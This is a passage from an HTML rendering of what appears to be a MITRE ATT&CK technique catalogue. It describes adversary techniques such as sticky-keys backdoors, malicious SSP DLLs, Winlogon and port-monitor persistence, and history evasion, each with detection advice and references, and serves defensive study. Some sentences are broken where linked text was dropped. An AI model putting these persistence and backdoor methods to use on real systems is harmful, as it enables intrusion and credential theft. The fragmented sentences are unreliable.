<h3 id="_service_registry_permissions_weakness"><a class="anchor" href="#_service_registry_permissions_weakness"></a><a class="link" href="#_service_registry_permissions_weakness">Service Registry Permissions Weakness</a></h3>
<div class="paragraph">
<p>Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service&#8217;s Registry keys can be manipulated to modify a service&#8217;s execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through Access Control Lists and permissions.Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Services, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 689. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1058">https://attack.mitre.org/wiki/Technique/T1058</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx">https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_admin_shares"><a class="anchor" href="#_windows_admin_shares"></a><a class="link" href="#_windows_admin_shares">Windows Admin Shares</a></h3>
<div class="paragraph">
<p>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include &lt;code&gt;C$&lt;/code&gt;, &lt;code&gt;ADMIN$&lt;/code&gt;, and &lt;code&gt;IPC$&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.Net utility can be used to connect to Windows admin shares on remote systems using &lt;code&gt;net use&lt;/code&gt; commands with valid credentials.Net, on the command-line interface and <a id="Discovery"></a> techniques that could be used to find remotely accessible systems.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Authentication logs, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 690. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1077">https://attack.mitre.org/wiki/Technique/T1077</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://support.microsoft.com/kb/314984">http://support.microsoft.com/kb/314984</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc787851.aspx">https://technet.microsoft.com/en-us/library/cc787851.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Server%20Message%20Block">https://en.wikipedia.org/wiki/Server%20Message%20Block</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/jepayne/archive/2015/11/27/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts.aspx">http://blogs.technet.com/b/jepayne/archive/2015/11/27/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/bb490717.aspx">https://technet.microsoft.com/bb490717.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/jepayne/archive/2015/11/24/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem.aspx">http://blogs.technet.com/b/jepayne/archive/2015/11/24/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winlogon_helper_dll"><a class="anchor" href="#_winlogon_helper_dll"></a><a class="link" href="#_winlogon_helper_dll">Winlogon Helper DLL</a></h3>
<div class="paragraph">
<p>Winlogon is a part of some Windows versions that performs actions at logon. In Windows systems prior to Windows Vista, a Registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup for persistence.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for changes to registry entries in &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&lt;/code&gt; that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values.[[Citation: TechNet Autoruns]] New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.</p>
</div>
<div class="paragraph">
<p>Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through <a id="Discovery"></a>, and [[Lateral Movement]].</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows XP, Windows Server 2003 R2</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 691. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1004">https://attack.mitre.org/wiki/Technique/T1004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_share_discovery"><a class="anchor" href="#_network_share_discovery"></a><a class="link" href="#_network_share_discovery">Network Share Discovery</a></h3>
<div class="paragraph">
<p>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>File sharing over a Windows network occurs over the SMB protocol.Net can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows 10, Windows 7, Windows 8, Windows 8.1, Windows Server 2012, Windows Server 2008 R2, Windows Server 2012 R2, Windows Server 2003, Windows Server 2008, Windows XP, Windows Server 2003 R2, Windows Vista, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Process command-line parameters, Network protocol analysis, Process use of network</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 692. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1135">https://attack.mitre.org/wiki/Technique/T1135</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Shared%20resource">https://en.wikipedia.org/wiki/Shared%20resource</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/cc770880.aspx">https://technet.microsoft.com/library/cc770880.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_services"><a class="anchor" href="#_remote_services"></a><a class="link" href="#_remote_services">Remote Services</a></h3>
<div class="paragraph">
<p>An adversary may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</p>
</div>
<div class="paragraph">
<p>Detection: Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through <a id="Discovery"></a> techniques prior to attempting [[Lateral Movement]].</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 693. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1021">https://attack.mitre.org/wiki/Technique/T1021</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_accessibility_features"><a class="anchor" href="#_accessibility_features"></a><a class="link" href="#_accessibility_features">Accessibility Features</a></h3>
<div class="paragraph">
<p>Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.</p>
</div>
<div class="paragraph">
<p>Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.[[Citation: Tilbury 2014]]</p>
</div>
<div class="paragraph">
<p>For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges.[[Citation: Tilbury 2014]]</p>
</div>
<div class="paragraph">
<p>Other accessibility features exist that may also be leveraged in a similar fashion:[[Citation: DEFCON2016 Sticky Keys]]</p>
</div>
<div class="paragraph">
<p>*On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
*Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
*Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
*Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
*App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>Detection: Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Paul Speulstra, AECOM Global Security Operations Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 694. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1015">https://attack.mitre.org/wiki/Technique/T1015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/">http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom">https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html">https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taint_shared_content"><a class="anchor" href="#_taint_shared_content"></a><a class="link" href="#_taint_shared_content">Taint Shared Content</a></h3>
<div class="paragraph">
<p>Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary&#8217;s code on a remote system. Adversaries may use tainted shared content to move laterally.</p>
</div>
<div class="paragraph">
<p>Detection: Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to [[Command and Control]] and possible network <a id="Discovery"></a> techniques.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 695. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1080">https://attack.mitre.org/wiki/Technique/T1080</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_external_remote_services"><a class="anchor" href="#_external_remote_services"></a><a class="link" href="#_external_remote_services">External Remote Services</a></h3>
<div class="paragraph">
<p>Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services.</p>
</div>
<div class="paragraph">
<p>Adversaries may use remote services to access and persist within a network.Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of Redundant Access during an operation.</p>
</div>
<div class="paragraph">
<p>Detection: Follow best practices for detecting adversary use of Valid Accounts for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>Contributors: Daniel Oakley</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 696. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1133">https://attack.mitre.org/wiki/Technique/T1133</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/">https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_deployment_software"><a class="anchor" href="#_application_deployment_software"></a><a class="link" href="#_application_deployment_software">Application Deployment Software</a></h3>
<div class="paragraph">
<p>Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.</p>
</div>
<div class="paragraph">
<p>Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 697. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1017">https://attack.mitre.org/wiki/Technique/T1017</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_automated_collection"><a class="anchor" href="#_automated_collection"></a><a class="link" href="#_automated_collection">Automated Collection</a></h3>
<div class="paragraph">
<p>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.</p>
</div>
<div class="paragraph">
<p>This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.</p>
</div>
<div class="paragraph">
<p>Detection: Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as Data Staged. As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Data loss prevention, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 698. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1119">https://attack.mitre.org/wiki/Technique/T1119</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_security_support_provider"><a class="anchor" href="#_security_support_provider"></a><a class="link" href="#_security_support_provider">Security Support Provider</a></h3>
<div class="paragraph">
<p>Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user&#8217;s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.
[[Citation: Graeber 2014]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8.[[Citation: Graeber 2014]][[Citation: Microsoft Configure LSA]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: DLL monitoring, Windows Registry, Loaded DLLs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 699. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1101">https://attack.mitre.org/wiki/Technique/T1101</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html">http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn408187.aspx">https://technet.microsoft.com/en-us/library/dn408187.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_histcontrol"><a class="anchor" href="#_histcontrol"></a><a class="link" href="#_histcontrol">HISTCONTROL</a></h3>
<div class="paragraph">
<p>The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</p>
</div>
<div class="paragraph">
<p>Detection: Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Authentication logs, File monitoring, Environment variable</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 700. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1148">https://attack.mitre.org/wiki/Technique/T1148</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rundll32"><a class="anchor" href="#_rundll32"></a><a class="link" href="#_rundll32">Rundll32</a></h3>
<div class="paragraph">
<p>The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 701. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1085">https://attack.mitre.org/wiki/Technique/T1085</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_sniffing"><a class="anchor" href="#_network_sniffing"></a><a class="link" href="#_network_sniffing">Network Sniffing</a></h3>
<div class="paragraph">
<p>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.</p>
</div>
<div class="paragraph">
<p>User credentials may be sent over an insecure, unencrypted protocol that can be captured and obtained through network packet analysis. An adversary may place a network interface into promiscuous mode, using a utility to capture traffic in transit over the network or use span ports to capture a larger amount of data. In addition, Address Resolution Protocol (ARP) and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.</p>
</div>
<div class="paragraph">
<p>Detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Network device logs, Host network interface, Netflow/Enclave netflow</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 702. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1040">https://attack.mitre.org/wiki/Technique/T1040</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_local_port_monitor"><a class="anchor" href="#_local_port_monitor"></a><a class="link" href="#_local_port_monitor">Local Port Monitor</a></h3>
<div class="paragraph">
<p>A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[[Citation: AddMonitor]] This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot.[[Citation: Bloxham]] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;.[[Citation: Bloxham]] The spoolsv.exe process also runs under SYSTEM level permissions.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</p>
</div>
<div class="paragraph">
<p>Detection: * Monitor process API calls to AddMonitor.
* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.
* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
* Monitor registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;.
* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism[[Citation: TechNet Autoruns]]</p>
</div>
<div class="paragraph">
